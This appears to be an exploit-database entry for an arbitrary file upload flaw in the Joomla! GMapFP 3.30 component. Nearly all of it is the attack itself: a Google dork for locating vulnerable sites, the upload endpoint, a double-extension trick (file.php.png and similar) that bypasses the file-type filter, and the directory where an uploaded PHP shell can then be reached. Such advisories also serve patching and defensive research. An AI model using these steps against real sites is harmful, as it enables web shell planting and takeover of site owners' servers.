# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-25 # Exploit Author: ThelastVvV # Vendor Homepage:https://gmapfp.org/ # Version:* Version J3.30pro # Tested on: Ubuntu # PoC: http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image # you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg # Dir File Path: http://127.0.0.1/images/gmapfp/file.php or http://127.0.0.1//images/gmapfp/file.php.png # The Joomla Gmapfp Components 3.x is allowing # remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
